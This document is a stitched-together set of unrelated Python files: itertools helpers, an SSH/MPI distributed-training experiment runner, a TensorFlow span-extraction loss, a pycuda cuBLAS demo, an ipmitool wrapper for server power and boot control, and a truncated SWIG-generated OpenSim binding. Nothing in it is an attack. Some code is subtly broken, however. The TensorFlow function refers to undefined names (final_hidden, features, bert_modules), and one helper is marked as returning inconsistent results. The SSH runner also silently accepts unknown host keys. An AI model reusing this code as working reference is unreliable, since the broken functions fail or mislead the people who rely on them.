zip_longest: Make an iterator that aggregates elements from each of the
iterables. If the iterables are of uneven length, missing values are
filled-in with fillvalue. Iteration continues until the longest iterable
is exhausted.
"""
args = [iter(iterable)] * n
return zip_longest(*args, fillvalue=fillvalue)
# def dict_grouper_memory(iterable, n):
# chunks = [iter(iterable.items())] * n
# generators = (dict(filter(None, v)) for v in zip_longest(*chunks))
# return generators
def dict_grouper(iterable, n):
"""
TODO: investigate why not always returning same results
Stream the elements of the the dictionary in groups of "n".
@see http://programeveryday.com/post/using-python-itertools-to-save-memory/
The chain function can take any number of iterables and will return a new
iterable which combines the passed in iterables.
: rtype itertools.chain:
"""
sourceiter = iter(iterable.items())
while True:
group_iter = islice(sourceiter, n)
yield chain([next(group_iter)], group_iter)
# def prin_trace():
# import traceback
# exc_type, exc_value, exc_traceback = sys.exc_info()
# print("*** print_tb:")
# traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
# print("*** print_exception:")
# traceback.print_exception(exc_type, exc_value, exc_traceback,
# limit=2, file=sys.stdout)
# print("*** print_exc:")
# traceback.print_exc()
def ask_yes_no(question, default="y"):
"""Ask a yes/no question via raw_input() and return the answer
as a boolean.
:param question: the question displayed to the user
:param default: the default answer if the user hits <Enter>
"""
valid = {"y": True, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "y":
prompt = " [Y/n] "
elif default == "n":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
choice_letter = choice[0]
if choice_letter in valid:
return valid[choice_letter]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
|
import os
from os.path import expanduser, join, abspath
import subprocess
import datetime
import shutil
import paramiko
class ExpRunner:
def __init__(self, python_exe: str,
script_path: str, script_args: str,
nodes: list, nGPU: str, eth: str, bw_limit: str,
log_folder=None) -> None:
""""""
self.python_bin = abspath(expanduser(python_exe))
self.script_path = abspath(expanduser(script_path))
self.script_args = script_args
self.nodes = nodes
self.nGPU = nGPU # for each machine
self.eth = eth # name if NIC
self.bw_limit = bw_limit
self.log_folder = log_folder
self.key = paramiko.RSAKey.from_private_key_file(expanduser("~/.ssh/id_rsa"))
self._init_ssh()
self.exist_logs = self._get_logs()
def _init_ssh(self):
print('='*10, 'initializing ssh connections')
self.clients = []
for node in self.nodes:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=node, username="ubuntu", pkey=self.key)
self.clients.append((node, client))
print('IP', node, 'DONE')
print('='*10, 'initialization for ssh clients DONE')
def _init_host_env(self):
""""""
for ip, cli in self.clients:
check_cmd = "cd ~/; ls|grep distributed-training"
_, stdout, stderr = cli.exec_command(check_cmd)
if stdout.read() != b"":
git_pull = "cd ~/distributed-training; git pull"
self._exec_cli_cmd(cli, git_pull, '{}: git pull'.format(ip))
else:
cmd = "cd ~/; "\
"git clone https://github.com/zarzen/distributed-training.git"
self._exec_cli_cmd(cli, cmd, "{}: clone training scripts".format(ip))
def _exec_cli_cmd(self, cli, cmd, msg=None):
if msg:
print('>'*10, msg, '<'*10)
_, stdout, stderr = cli.exec_command(cmd)
print('cmd stdout: ', stdout.read().decode('utf-8'),
"cmd stderr: ", stderr.read().decode('utf-8'))
if msg:
print('>'*10, 'DONE', msg, '<'*10)
def bandwith_control(self):
"""
"""
del_cmd = "sudo tc qdisc del dev {} root tbf rate 40Gbit latency 400ms burst 3000kbit".format(self.eth)
# if self.bw_limit = "" then we don't execute the add_cmd
add_cmd = "sudo tc qdisc add dev {} root tbf rate {} latency 400ms burst 3000kbit".format(self.eth, self.bw_limit)
for (ip, cli) in self.clients:
# try to delete rate limit
stdin, stdout, stderr = cli.exec_command(del_cmd)
print(ip, ":", stdout.read(), stderr.read())
stdin, stdout, stderr = cli.exec_command(del_cmd)
print(ip, ":", stdout.read(), stderr.read())
if self.bw_limit:
print(ip, ": adding bandwidth limit", add_cmd)
stdin, stdout, stderr = cli.exec_command(add_cmd)
print(ip, ':', stdout.read(), stderr.read())
def exe_dist_train(self) -> subprocess.Popen:
""" execute distributed training script at rank0
:return process:
"""
train_cmd = self.build_train_cmd()
print("Exec:", " ".join(train_cmd))
p = subprocess.Popen(' '.join(train_cmd), shell=True)
return p
def build_train_cmd(self):
""""""
nNodes = len(self.nodes)
np = str(nNodes * int(self.nGPU))
hosts = ",".join(["{}:{}".format(ip, self.nGPU) for ip in self.nodes])
cmd = ["mpirun",
"-np", np,
"-H", hosts,
"-bind-to", "none",
"-map-by", "slot",
"-x", "NCCL_DEBUG=INFO",
"-x", "LD_LIBRARY_PATH",
"-x", "PATH",
"-x", "PYTHONPATH={}".format(
expanduser("~/autorun/horovod-modified/build/lib.linux-x86_64-3.6")),
"-mca", "btl ^openib",
"-mca", "btl_tcp_if_exclude lo,docker0",
self.python_bin, self.script_path,
self.script_args]
return cmd
def _get_logs(self):
cpu_logs, net_logs = self._get_cpu_net_log()
hook_logs, model_logs, mpi_logs = self._get_horovod_logs()
return cpu_logs, net_logs, hook_logs, model_logs, mpi_logs
def run(self):
""""""
self._init_host_env()
print('='*10, "working on bandwidth control")
self.bandwith_control()
print('='*10, "bandwidth control DONE")
cpu_p, net_p = self._exe_res_monitor()
print(">"*10, 'launched CPU & Network monitoring')
print('*'*10, 'Start working on experiment script')
train_p = self.exe_dist_train()
train_p.wait()
print('*'*10, 'Experiment finished')
cpu_p.terminate()
net_p.terminate()
print('End experiment')
self.move_log()
def _exe_res_monitor(self):
""" execute cpu and network bandwidth monitor
"""
# record existing logs
cpu_monitor_script = expanduser("~/autorun/monitor_cpu.py")
net_monitor_script = expanduser("~/autorun/monitor_net.py")
cpu_p = subprocess.Popen([self.python_bin, cpu_monitor_script],
stdout=subprocess.DEVNULL)
net_p = subprocess.Popen([self.python_bin, net_monitor_script],
stdout=subprocess.DEVNULL)
return cpu_p, net_p
def move_log(self):
""" rename horovod_logs -> horovod_logs_<bandwidth>,
moving cpu.log and net.log into horovod_logs_<bandwidth> folder
"""
# cpu, net, hook, model, mpi
n_cpu, n_net, n_hook, n_model, n_mpi = self._get_logs()
e_cpu, e_net, e_hook, e_model, e_mpi = self.exist_logs
def _moving(src, dst, files):
for _f in files:
shutil.copy2(join(src, _f), join(dst, _f))
dst_folder = self.log_folder if self.log_folder \
else "./log_archives/{}-{}".format(datetime.datetime.now().strftime("%Y%m%d-%H%M%S"),
self.bw_limit)
os.makedirs(dst_folder)
_moving("./logs/cpu", dst_folder, n_cpu - e_cpu)
_moving("./logs/net", dst_folder, n_net - e_net)
_moving(expanduser("~/horovod_logs/hooks"), dst_folder, n_hook-e_hook)
_moving(expanduser("~/horovod_logs/model_log/"), dst_folder, n_model-e_model)
_moving(expanduser("~/horovod_logs/mpi_events"), dst_folder, n_mpi-e_mpi)
with open(join(dst_folder, "readme"), 'w+') as ofile:
ofile.write("bandwidth limit: " + self.bw_limit)
def _get_cpu_net_log(self):
"""
record current exisiting logs
"""
log_path = "./logs"
log_path = expanduser(log_path)
net_logs = os.listdir(join(log_path, 'net'))
cpu_logs = os.listdir(join(log_path, 'cpu'))
return set(cpu_logs), set(net_logs)
def _get_horovod_logs(self):
base_dir = expanduser("~/horovod_logs")
hook_logs = os.listdir(join(base_dir, "hooks"))
model_logs = os.listdir(join(base_dir, "model_log"))
mpi_logs = os.listdir(join(base_dir, "mpi_events"))
return set(hook_logs), set(model_logs), set(mpi_logs)
def main():
""""""
python_bin = "/usr/bin/python3"
exp = ExpRunner(python_bin,
"~/autorun/distributed-training/test_scripts/pytorch_resnet101_cifar10.py",
"--epochs 1", # args of the script we want to run
["localhost", "172.31.24.153"], # list of worker's ip
nGPU="1", # nGPU on each machine
eth="ens3", # NIC interface name, used for bandwidth limit
bw_limit="", # limiting bandwidth, 100Mbit, 1Gbit, 10Gbit 25Gbit, 40Gbit,
log_folder="" # if not specified, it will used the timestamp
)
exp.run()
if __name__ == "__main__":
main() |
import tensorflow as tf
from utils.bert import bert_utils
from loss import loss_utils
from utils.bert import albert_modules
def span_extraction_classifier(config,
sequence_output,
start_positions,
end_positions,
input_span_mask):
final_hidden_shape = bert_modules.get_shape_list(sequence_output,
expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/mrc_span/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/mrc_span/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
# apply output mask
adder = (1.0 - tf.cast(input_span_mask, tf.float32)) * -10000.0
start_logits += adder
end_logits += adder
def compute_loss(logits, positions):
on_hot_pos = tf.one_hot(positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(tf.reduce_sum(on_hot_pos * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
return (total_loss, start_logits, end_logits)
|
import pycuda.autoinit
from pycuda import gpuarray
import numpy as np
from skcuda import cublas
a = np.float32(10)
x = np.float32([1, 2, 3])
y = np.float32([-.345, 8.15, -15.867])
x_gpu = gpuarray.to_gpu(x)
y_gpu = gpuarray.to_gpu(y)
cublas_context_h = cublas.cublasCreate()
cublas.cublasSaxpy(cublas_context_h, x_gpu.size, a, x_gpu.gpudata, 1, y_gpu.gpudata, 1)
cublas.cublasDestroy(cublas_context_h)
print("This is close to the NumPy approximation: {}".format(np.allclose(a * x + y, y_gpu.get())))
|
#
# Copyright (c) 2014 Nutanix Inc. All rights reserved.
#
"""
Provides utils related to IPMI, and wrapper around ipmitool calls.
"""
import json
import logging
import re
import time
from curie.curie_error_pb2 import CurieError
from curie.exception import CurieException
from curie.log import CHECK_EQ
from curie.oob_management_util import OobManagementUtil
from curie.util import CurieUtil
log = logging.getLogger(__name__)
class Flag(object):
def __init__(self, switch, value):
self._switch = switch
self._value = value
def __iter__(self):
return iter([self._switch, str(self._value)])
def __str__(self):
return " ".join(self)
def to_unredacted(self):
return self
class RedactedFlag(Flag):
def __iter__(self):
return iter([self._switch, "<REDACTED>"])
def to_unredacted(self):
return Flag(self._switch, self._value)
class RepeatedFlag(Flag):
def __iter__(self):
return iter([self._switch] * self._value)
class SystemEvent(object):
FIELDS = ["event_id", "timestamp", "sensor", "description", "direction"]
TIME_FORMAT = "%m/%d/%Y %H:%M:%S"
def __init__(self, raw_ipmi_output):
ipmi_info = map(lambda col: col.strip(), raw_ipmi_output.split("|"))
# Combine date and time into one field, shift rest of array.
ipmi_info[1] = "%s %s" % (ipmi_info[1], ipmi_info.pop(2))
# NOTE: Setting these fields explicitly, rather than iterating to aid
# with autocomplete and pylint.
self.event_id = int(ipmi_info[0], base=16)
# Event times only have resolution in seconds.
self.timestamp = int(time.mktime(time.strptime(ipmi_info[1],
self.TIME_FORMAT)))
self.sensor = ipmi_info[2]
self.description = ipmi_info[3]
self.direction = ipmi_info[4]
def __str__(self):
return json.dumps(
dict(map(lambda f: (f, getattr(self, f)), self.FIELDS)),
indent=2, sort_keys=True)
class IpmiUtil(OobManagementUtil):
"""
Wraps calls to ipmitool.
Generated commands will be of the form:
<IPMITOOL_ABSPATH> <GENERATED_FLAGS> <COMMAND> [SUB_COMMAND] [CMD_ARGS]
"""
VALID_BOOT_DEVICES = [
"none", "pxe", "disk", "safe", "diag", "cdrom", "bios", "floppy"]
# Upper limit on exponential backoff applied to interval between retries.
_MAX_RETRY_INTERVAL_SECS = 16
def __init__(self, ip, username, password, interface="lanplus",
verbosity=0, ipmitool_abspath="/usr/bin/ipmitool"):
self.host = ip
self.__ipmitool_abspath = ipmitool_abspath
self.__flags = {
"host": Flag("-H", ip),
"user": RedactedFlag("-U", username),
"password": RedactedFlag("-P", password),
"interface": Flag("-I", interface),
"verbosity": RepeatedFlag("-v", verbosity)
}
def get_chassis_status(self):
"""
Returns:
(dict): Map of IPMI chassis status data.
Raises:
CurieException on error.
"""
stdout, stderr = self.__execute_command_with_retries(["chassis", "status"])
output_map = {}
for line in stdout.splitlines():
key, value = line.split(":")
output_map[key.strip()] = value.strip()
return output_map
def power_cycle(self, async=False):
"""
Power cycles the node associated with 'self.__flags["host"]'.
Args:
async (bool): Optional. If False, making blocking calls to 'power_off'
and then 'power_on'.
If True and node is powered off, performs async 'power_on' call,
otherwise issues the (async) 'power cycle' command.
Returns:
(bool): True on success, else False.
"""
if not self.is_powered_on():
log.warning("power_cycle requested for powered-down node via IPMI at "
"'%s'", self.__flags["host"])
return self.power_on(async=async)
if async:
try:
self.__execute_command_with_retries(["power", "cycle"])
return True
except CurieException:
log.warning("Failed to power cycle", exc_info=True)
return False
# Synchronous: perform blocking calls to power off then power on.
if not self.power_off(async=False):
return False
return self.power_on(async=False)
def power_on(self, async=False):
"""
Powers on the node associated with 'self.__flags["host"]'.
Args:
async (bool): Optional. If False, block until power state is on.
Returns:
(bool): True on success, else False.
"""
# NB: IPMI power ops are not necessarily idempotent, so it's necessary to
# check the power state before issuing the command. This still does not
# guarantee that we're safe from a potential race.
if self.is_powered_on():
return True
try:
self.__execute_command_with_retries(["power", "on"])
except CurieException:
log.exception("Exception in __execute_command_with_retries")
return False
if async:
return True
return CurieUtil.wait_for(
self.is_powered_on,
"node '%s' to power on" % self.__flags["host"]._value,
timeout_secs=600, poll_secs=5)
def power_off(self, async=False):
"""
Powers off the node associated with 'self.__flags["host"]'.
Args:
async (bool): Optional. If False, block until power state is off.
Returns:
(bool): True on success, else False.
"""
# NB: IPMI power ops are not necessarily idempotent, so it's necessary to
# check the power state before issuing the command. This still does not
# guarantee that we're safe from a potential race.
if not self.is_powered_on():
return True
try:
self.__execute_command_with_retries(["power", "off"])
except CurieException:
log.exception("Exception in __execute_command_with_retries")
return False
if async:
return True
return CurieUtil.wait_for(
lambda: not self.is_powered_on(),
"node '%s' to power off" % self.__flags["host"]._value,
timeout_secs=600, poll_secs=5)
def is_powered_on(self):
"""
Checks whether chassis power state is 'on'.
Returns:
(bool) True if powered on, else False.
"""
status = self.get_chassis_status().get("System Power", "")
return status.strip().lower() == "on"
def get_fru_info(self):
"""
Dump FRU info.
Returns:
(list<dict>): List of FRU info dicts.
"""
fru_list = []
# TODO: See if there's a guaranteed upper bound on the number of valid
# fru_ids.
for ii in range(256):
try:
# Get byte-length of FRU data at index 'ii'.
stdout, stderr = self.__execute_command_with_retries(
["raw", "0x0a", "0x10", hex(ii)])
except CurieException:
# Index 0 should exist. Raise exception if we fail to find data.
# Otherwise, assume we've found the last FRU index.
if ii == 0:
raise
break
try:
curr_fru_byte_length = int("0x%s" % "".join(stdout.split()), 16)
except (TypeError, ValueError):
# Unable to parse output as a hex string, consider index as invalid.
curr_fru_byte_length = 0
# Index 0 should not have length 0, otherwise, assume we've found the
# last FRU index.
if curr_fru_byte_length == 0:
if ii == 0:
raise CurieException(
CurieError.kInternalError,
"Failed to parse length for fru_id 0:\n\tstdout=%s\n\tstderr=%s" %
(stdout, stderr))
break
# FRU index 'ii' reports non-zero length, attempt to dump contents.
try:
stdout, stderr = self.__execute_command_with_retries(
["fru", "print", str(ii)])
except CurieException:
log.warning("Unable to read data from fru_id '%s'", exc_info=True)
time.sleep(1)
continue
# Possible FRU data is invalid (in particular, that reading from the
# index will return a block of zeros). This may result in stdout
# reporting an error, or containing no data.
lines = []
if stdout is not None:
# Filter out section headers.
lines = filter(lambda l: l.count(":") > 0, stdout.splitlines())
# Skip empty data.
if lines:
fru_list.append(dict(map(
lambda l: map(str.strip, l.split(":", 1)), lines)))
if not lines:
log.warning("Skipping invalid data from fru_id '%s':\n"
"\tstdout=%s\n"
"\tstderr=%s", ii, stdout, stderr)
# Avoid flooding IPMI with requests.
time.sleep(1)
return fru_list
def get_lan_config(self):
"""
Get IP, MAC address, etc. for the node's IPMI.
Returns:
(dict): Map of IPMI lan cofiguration data.
"""
stdout, stderr = self.__execute_command_with_retries(["lan", "print"])
# Various keys have multiline data.
stdout = re.sub(r"\n\s+:", ";:;", stdout)
# Key/Val pairs.
lan_map_pairs = map(
lambda tupl: map(str.strip, tupl),
map(lambda line: line.split(":", 1), stdout.splitlines()))
# Some values may themselves be space separated lists, or lists of colon
# delimited pairs.
sub_objs = filter(lambda pair: ";:;" in pair[1], lan_map_pairs)
sub_objs = map(lambda pair: (pair[0], pair[1].split(";:;")), sub_objs)
sub_lists = filter(lambda pair: ":" not in pair[1], sub_objs)
sub_dicts = filter(lambda pair: ":" in pair[1], sub_objs)
sub_lists = map(lambda pair: (pair[0], map(str.strip, pair[1])), sub_lists)
sub_lists = dict(sub_lists)
sub_dicts = map(lambda pair: (
pair[0], dict(map(str.strip, pair[1].split(":")))), sub_dicts)
sub_dicts = dict(sub_dicts)
lan_map = dict(lan_map_pairs)
lan_map.update(sub_lists)
lan_map.update(sub_dicts)
return lan_map
def get_mac_addrs_supermicro(self):
"""
Get MAC addresses for the node's network cards.
NB: Returns only two addresses, second address is autogenerated.
Returns:
(list<str>): MAC Addresses.
"""
stdout, stderr = self.__execute_command_with_retries(
["raw", "0x30", "0x21"])
byte_list = stdout.split()
CHECK_EQ(len(byte_list), 10, "Failed to retrieve MAC addresses from BMC")
macs = ["-".join(byte_list[-6:])]
byte_list[-1] = "%02x" % (int(byte_list[-1], base=16) + 1)
macs.append("-".join(byte_list[-6:]))
return macs
def get_event_log(self):
"""
Dump System Event Log.
Returns:
(list<dict>): List of events represented as dict/JSON.
"""
stdout, stderr = self.__execute_command_with_retries(["sel", "list"])
return [SystemEvent(line) for line in stdout.splitlines()]
def set_bootdev_pxe(self):
"""
Forces PXE on next boot for the node associated with
'self.__flags["host"]'.
Returns:
(bool): True on success, else False.
"""
try:
self.set_bootdev("pxe")
return True
except Exception:
log.exception("Exception in set_bootdev")
return False
def set_bootdev(self, device):
"""
Sets first bootdevice to `device`.on next boot for the node associated
with 'self.__flags["host"]'.
Returns:
(bool): True on success, else False.
"""
if device not in self.VALID_BOOT_DEVICES:
raise CurieException(CurieError.kInvalidParameter,
"Invalid boot device '%s'" % device)
try:
stdout, stderr = self.__execute_command_with_retries(
["chassis", "bootdev", device])
except CurieException:
log.exception("Exception in 'chassis bootdev %s'", device)
return False
return True
def __execute_command(self, cmd):
"""
Executes 'cmd' via ipmitool 'self.__ipmitool_abspath' using '__flags'.
Returns:
(tuple): (rv, stdout, stderr)
Raises:
CurieException on bad input or failure to execute the command.
"""
if isinstance(cmd, basestring):
cmd = cmd.split(" ")
if not isinstance(cmd, list):
raise CurieException(
CurieError.kInternalError,
"'cmd' must be of type list or str, not '%s'" % cmd.__class__.__name__)
generated_cmd = []
map(generated_cmd.extend,
[[self.__ipmitool_abspath], self.__get_flag_list(redacted=False), cmd])
redacted_cmd = []
map(redacted_cmd.extend,
[[self.__ipmitool_abspath], self.__get_flag_list(redacted=True), cmd])
log.info("Executing IPMI command:\n\t'%s'", " ".join(redacted_cmd))
rv, stdout, stderr = CurieUtil.timed_command(
" ".join(generated_cmd), timeout_secs=60,
formatted_cmd=" ".join(redacted_cmd))
cmd_output = "rv=%s\nstdout=%s\nstderr=%s" % (rv, stdout, stderr)
if rv < 0:
raise CurieException(
CurieError.kInternalError,
"Failed to execute command: '%s': %s" % (redacted_cmd, cmd_output))
log.debug(cmd_output)
return (rv, stdout, stderr)
def __execute_command_with_retries(self, cmd, max_retries=5):
"""
Executes 'cmd', retrying on error up to 'max_retries' times.
Interval between calls has exponential backoff applied up to a cap of
'_MAX_RETRY_INTERVAL_SECS'.
Returns:
(tuple): (stdout, stderr)
Raises:
CurieException if 'cmd' does not succeed within 'max_retries' + 1 calls.
"""
curr_retry_interval_secs = 1
for ii in range(max_retries + 1):
try:
rv, stdout, stderr = self.__execute_command(cmd)
if rv == 0:
return stdout, stderr
error_msg = (
"Error executing '%s':\n\trv=%s\n\tstdout=%s\n\tstderr=%s" %
(cmd, rv, stdout, stderr))
except CurieException as exc:
error_msg = "'%s' failed: '%s'" % (cmd, exc)
if ii < max_retries:
log.error(error_msg)
log.info("Retrying (%d of %d retries)", ii + 1, max_retries)
curr_retry_interval_secs = min(self._MAX_RETRY_INTERVAL_SECS,
2 * curr_retry_interval_secs)
time.sleep(curr_retry_interval_secs)
else:
raise CurieException(CurieError.kInternalError, error_msg)
def __get_flag_list(self, redacted=True):
"""
Generates list of command line switch/values to pass with the command.
Args:
redacted (bool): Optional. If False, RedactedFlags are returned unmasked.
Returns:
(list<Flag>): List of flags (corresponds to splitting serialized flags on
whitespace).
"""
flags = []
if not redacted:
map(flags.extend, [f.to_unredacted() for f in self.__flags.values()])
else:
map(flags.extend, self.__flags.values())
return flags
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.9
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_actuators')).lstrip('.')
return importlib.import_module(mname)
_actuators = swig_import_helper()
del swig_import_helper
elif version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_actuators', [dirname(__file__)])
except ImportError:
import _actuators
return _actuators
if fp is not None:
try:
_mod = imp.load_module('_actuators', fp, pathname, description)
finally:
fp.close()
return _mod
_actuators = swig_import_helper()
del swig_import_helper
else:
import _actuators
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except __builtin__.Exception:
weakref_proxy = lambda x: x
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _actuators.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""
value(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator const *
"""
return _actuators.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(SwigPyIterator self, size_t n=1) -> SwigPyIterator
Parameters
----------
n: size_t
incr(SwigPyIterator self) -> SwigPyIterator
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(SwigPyIterator self, size_t n=1) -> SwigPyIterator
Parameters
----------
n: size_t
decr(SwigPyIterator self) -> SwigPyIterator
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_decr(self, n)
def distance(self, x):
"""
distance(SwigPyIterator self, SwigPyIterator x) -> ptrdiff_t
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator_distance(self, x)
def equal(self, x):
"""
equal(SwigPyIterator self, SwigPyIterator x) -> bool
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator_equal(self, x)
def copy(self):
"""
copy(SwigPyIterator self) -> SwigPyIterator
Parameters
----------
self: swig::SwigPyIterator const *
"""
return _actuators.SwigPyIterator_copy(self)
def next(self):
"""
next(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_next(self)
def __next__(self):
"""
__next__(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator___next__(self)
def previous(self):
"""
previous(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_previous(self)
def advance(self, n):
"""
advance(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""
__eq__(SwigPyIterator self, SwigPyIterator x) -> bool
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""
__ne__(SwigPyIterator self, SwigPyIterator x) -> bool
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""
__iadd__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""
__isub__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""
__add__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
__sub__(SwigPyIterator self, SwigPyIterator x) -> ptrdiff_t
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _actuators.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
import opensim.simulation
import opensim.common
import opensim.simbody
class CoordinateActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::CoordinateActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, CoordinateActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, CoordinateActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> CoordinateActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.CoordinateActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(CoordinateActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.CoordinateActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.CoordinateActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(CoordinateActuator self) -> CoordinateActuator
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(CoordinateActuator self) -> std::string const &
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_getConcreteClassName(self)
def copyProperty_coordinate(self, source):
"""
copyProperty_coordinate(CoordinateActuator self, CoordinateActuator source)
Parameters
----------
source: OpenSim::CoordinateActuator::Self const &
"""
return _actuators.CoordinateActuator_copyProperty_coordinate(self, source)
def append_coordinate(self, value):
"""
append_coordinate(CoordinateActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.CoordinateActuator_append_coordinate(self, value)
def constructProperty_coordinate(self, *args):
"""
constructProperty_coordinate(CoordinateActuator self)
constructProperty_coordinate(CoordinateActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.CoordinateActuator_constructProperty_coordinate(self, *args)
def get_coordinate(self, *args):
"""
get_coordinate(CoordinateActuator self, int i) -> std::string const
Parameters
----------
i: int
get_coordinate(CoordinateActuator self) -> std::string const &
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_get_coordinate(self, *args)
def upd_coordinate(self, *args):
"""
upd_coordinate(CoordinateActuator self, int i) -> std::string
Parameters
----------
i: int
upd_coordinate(CoordinateActuator self) -> std::string &
Parameters
----------
self: OpenSim::CoordinateActuator *
"""
return _actuators.CoordinateActuator_upd_coordinate(self, *args)
def set_coordinate(self, *args):
"""
set_coordinate(CoordinateActuator self, int i, std::string const & value)
Parameters
